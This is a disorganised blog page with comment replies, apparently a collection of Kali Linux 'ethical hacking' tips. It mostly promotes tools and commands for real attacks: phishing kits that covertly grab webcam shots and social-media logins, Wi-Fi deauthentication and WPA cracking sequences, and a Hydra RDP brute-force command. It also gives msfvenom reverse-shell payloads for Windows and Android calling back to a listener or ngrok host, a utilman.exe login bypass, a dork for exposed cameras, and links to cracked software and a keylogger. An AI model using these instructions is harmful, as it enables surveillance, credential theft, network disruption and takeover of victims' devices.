Ethical hacking Tips using kalilinux
How to use Kali Linux - Online in the Cloud
All Cyber Security Tutorial click
1. open your browser and open this site https://www.onworks.net/
2. open website and show RUN ONLINE Button show, To click this button and wait 10 s and show your kali linux machine inter face
================================================
What is CamPhish?
CamPhish is techniques to take cam shots of target's phone front camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device
Features
In this tool I added two automatic webpage templates for engaged target on webpage to get more picture of cam
Festival Wishing
Live YouTube TV
Online Meeting [Beta]
simply enter festival name or youtube's video ID
google search : camphish github
link: https://github.com/techchipnet/CamPhish.git
==================================================
Disclaimer
Any actions and or activities related to Zphisher is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law.
This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.
This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!
It only demonstrates "how phishing works". You shall not misuse the information to gain unauthorized access to someones social media. However you may try out this at your own risk.
- Latest and updated login pages.
- Beginners friendly
- Multiple tunneling options
- Localhost
- Ngrok
- Cloudflared
- LocalXpose
- Mask URL support
- Docker support
Installation
Just, Clone this repository -
git clone --depth=1 https://github.com/htr-tech/zphisher.git
Now go to cloned directory and run
zphisher.sh
-$ cd zphisher $ bash zphisher.sh
On first launch, It'll install the dependencies and that's it. Zphisher is installed.
link: https://github.com/htr-tech/zphisher
================================================
password crack
stealer github pen drive
password-stealer
=================================================
===================================
CoWPAtty, developed by Joshua Wright, is a tool that automates offline dictionary attacks that WPA-PSK networks are vulnerable to. CoWPAtty is included on the Auditor CD, and is easy to use. Just as with WEP cracking, an ARP packet needs to be captured.
2.Aircarck-ng
Aircrack-ng uses various techniques to crack WEP and WPA/WPA2-PSK keys. Airbase-ng is a multipurpose tool aimed at attacking clients as opposed to the Access Point itself. Airdecloak-ng removes WEP Cloaking from a packet capture file. Airdrop-ng is a rule based wireless deauthication tool.
photo to binary
ReplyDeletehttps://github.com/sovheiv/Image-binary-code-converter
txt file
WEBSITE TO PRACTICE HACKING
ReplyDeletepentesterlab
hackthebox
hackthissite
portswigger
ethical hacking tutorial lean advanced
ReplyDelete1> WsCube Tech
2> simplilearn
3> bit.ly/secret Eh
Brup shuit pro creck download link
ReplyDeletehttps://drive.google.com/drive/folders/1Kb-g9BwlGAvlB5SKlonMdqLXwsRIo-dA?usp=share_link
vmware install amezone linux install in and
ReplyDeletelinux password crack step >> download link
https://medium.com/shehuawwal/download-and-run-amazon-linux-2-ami-locally-on-your-virtualbox-or-vmware-b554a98dcb1c
camera hacking tool using kali linux
ReplyDeletehttps://github.com/KasRoudra/CamHacker
https://github.com/techchipnet/CamPhish
ReplyDeletecame hacking git
chv 11 all tools
ReplyDeletehttps://drive.google.com/file/d/1uCrBQBIHcINtWXBAZuTTEwoFe2HMzBOg/view?usp=drive_link
kali in access to remote
ReplyDelete$xfreerdp /u:pradhyuman /p:Admin /v:192.168.0.1
this commands are use windows pc remote accesss
https://github.com/kinghacker0?tab=repositories
ReplyDeleteall tool check
browser in type all live camera show public
ReplyDeleteinurl:control/userimage.html
free domain hosting website
ReplyDeletegooglehost.com
smaillbusiness
dot.tk
freenom.com
ncl.eu.org
install tplink ac1300 wifi adpter driver install in kali linux
ReplyDeletehttps://www.youtube.com/watch?v=UqqmvXSm0vk
1. sudo apt install git build-essential linux-headers-$(uname -r)
2. git clone https://github.com/Rincat/RTL88x2BU-Linux-Driver.git
3. cd RTL88x2BU-Linux-Driver/
4. make
5. make install
6. modprobe 88x2bu
7.
and magic on light your wifi adapter
downlaod ios this link
ReplyDeletehttps://drive.google.com/drive/folders/1tXpAnMrQrxf4J-UxYJ6N_B_MiQ6ROh5k?usp=sharing
kali-linux-2019.4-amd64.iso
iwconfig wlan0 down
ReplyDeleteairmon-ng check kill
iwconfig wlan0 mode monitor
iwconfig wlan0 up
airodump-ng wlan0
>to show all wifi name in this commands
airodump-ng --bssid --channel 6 --write hacker wlan0
========================
airmon-ng check kill
iwconfig wlan0 mode monitor
aircrack-ng hacker.cap -w
jammer
ReplyDelete>airmon-ng check kill
iwconfig wlan0 mode monitor
>airodump wlan0
==show all wifi name
airodump-ng --bssid -c 1
>aireplay-ng --deauth 2000 -a wlan0
othewish
>aireplay-ng -0 0 -a -c wlan0
any erorr for channel to change your wifi adpter channel number
> airmon-ng start wlna0 5
>iwconfig wlan0 channel 5
>airmon-ng check kill
Deleteiwconfig wlan0 mode monitor
>airodump wlan0
==show all wifi name
airodump-ng --bssid -c 1 wlan0
>aireplay-ng --deauth 2000 -a wlan0
othewish
>aireplay-ng -0 0 -a -c wlan0
any erorr for channel to change your wifi adpter channel number
> airmon-ng start wlna0 5
>iwconfig wlan0 channel 5
airmon-ng
ReplyDeleteairmon-ng check kill
airmon-ng start wlan0
airodump-ng -a wlan0mon
aireplay-ng -0 0 -a DC:1A:C5:A7:61:D7 wlan0mon
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
Deletehydra -L user.txt -P pass.txt rdp://192.168.0.56
ReplyDeleterdp password attack
root# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=192.168.0.166 LPORT=444 -o test.exe
ReplyDeletemkdir /var/www/html/pradhyuman
chmod 777 /var/www/html/pradhyuman
cp test1.exe /var/www/html/pradhyuman
service apache2 start
msfconsole
msf6 > use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.166
set LPORT 444
exploit
meterpreter > sysinfo
meterpreter > help
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=17608 -o test.apk
Deletewindows password crack
ReplyDeleteshift f11
open cmd and write this comands
copy c windows system32 cmd.exe c:\windows\system32\utilman.exe
Dark-Phish (GITHUB)-- https://github.com/Cyber-Anonymous/Dark-Phish.git
ReplyDeleteRavana (GITHUB)--https://github.com/princekrvert/Ravana.git
https://drive.google.com/drive/folders/1quETshAboOmCPsk2Sv52n0TsS6LC8x9_?usp=drive_link
ReplyDeletedownload ardamax
video
https://youtube.com/playlist?list=PLboIPjigLuX7kqe5ERU_YoU_NBvDV_08K&si=qsKGSwFqSKL_9i2g
DeleteVideo link
unknown msg
ReplyDeletehttps://www.afreesms.com/freesms/
cap cut
ReplyDeletehttps://drive.google.com/drive/folders/1ULkjX2fHePcvOFOe8KDE_5tV5yKCwdCK?usp=sharing
Unable to capture passwords with wireshark?
ReplyDeletehttp.request.method == "POST"